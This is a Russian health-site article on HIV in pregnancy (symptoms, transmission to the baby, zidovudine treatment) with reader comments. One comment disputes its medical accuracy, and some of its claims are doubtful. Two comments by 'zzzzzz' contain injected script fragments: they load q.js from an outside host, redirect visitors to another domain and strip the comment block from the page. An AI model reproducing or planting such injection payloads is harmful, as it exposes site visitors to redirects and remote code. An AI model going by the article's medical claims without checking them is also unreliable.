Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  ВИЧ и беременность. Как з...  >>  ВИЧ и беременность. Как защититься?
 
Обратная связь
 

ВИЧ и беременность. Как защититься?

Размер шрифта
28 мая 2014 00:00
  • google_analytics: false
  • Нравится

ВИЧ и СПИД – страшные диагнозы, с которыми боится столкнуться любой из нас. А что делать, если вы еще и беременны?! О том, как защититься от  ВИЧ и СПИД, каковы их симптомы и как их лечить, читайте в нашей статье.

ВИЧ и беременность. Как защититься?

Распространенность

Около 6 500 женщин с диагнозом ВИЧ ежегодно рожают детей. Это состояние поддается лечению, однако от него невозможно избавиться окончательно. ВИЧ (вирус иммунодефицита человека) поражает ключевые элементы иммунной системы, которая борется с инфекцией. СПИД (синдром приобретенного иммунодефицита) – это финальная стадия ВИЧ, на которой происходят необратимые повреждения иммунной системы.

Симптомы

Как и многие другие инфекции, передающиеся половым путем, ВИЧ часто протекает бессимптомно, иногда до 10 лет. У некоторых женщин через 2-4 недель после инфицирования наблюдаются гриппоподобное состояние: повышение температуры тела, увеличение лимфоузлов, сыпь, боль в горле. Выявить ВИЧ можно с помощью анализа слюны или крови.

Риск для мамы и малыша

ВИЧ может передаться ребенку через плаценту в течение беременности или во время родов. Кроме того, это единственное заболевание, передающееся половым путем, которым можно заразить малыша при кормлении грудью.

Лечение

Ключевой момент лечения ВИЧ – это раннее начало лечения. В таком случае резко снижается вероятность передачи вируса ребенку. При лечении антивирусным препаратом зидовудином риск заражения плода уменьшается до 2%. Кроме того, дети ВИЧ-инфицированных получают этот препарат в течение 6 недель после рождения.

Понравилось? Читайте больше в нашем спецпроекте «Ребенок будет».

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - pomk93

06 июня 2014 в 09:48

Комментарий удален за нарушение Правил общения

2 - Гость

01 октября 2014 в 10:26

Цитировать   |   Пожаловаться

Абсолютный бред. Плацента наоборот защищает малыша в период всей беременности, и если вирусная нагрузка низкая т.е. менее 50 копий/мл то риск передачи вируса ребенка стремиться к нулю. Для этого женщине назначают АРВТ и во время самих родов так же очищают кровь лекарствами. Главное прием АРВТ и шанс родить здорового малыша у вас практически 98%

3 - zzzzzz

30 июня 2015 в 18:39

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

4 - zzzzzz

30 июня 2015 в 22:36

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Всемирная неделя первичного иммунодефицита начинается в Москве!   Сифилис и беременность. Как защититься?   Хламидия и беременность. Как защититься?   Беременность: как обезопасить себя и будущего малыша от вирусов  
08 июля 2013Теперь можно выбрать, какой ребенок у вас будет! ЭКО открывает новые горизонты 03 октября 2013Результаты благотворительного марафона «Всем миром»
 
10 июля 2013От того, что ест беременная женщина, зависит ум ее ребенка 18 июня 2013Повезло, живете в пешей доступности от шоссе? Не так быстро! Чем ближе к шоссе, тем больнее почки! Как защитить себя?
 

Слайдшоу

1
Можно ли подгадать с беременностью?
Можно ли пережить беременность без рвоты?
Мальчик или девочка? 6 мифов!

Тесты

1
Кофеин вызывает зависимость?
Будет ли у вас инфаркт?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.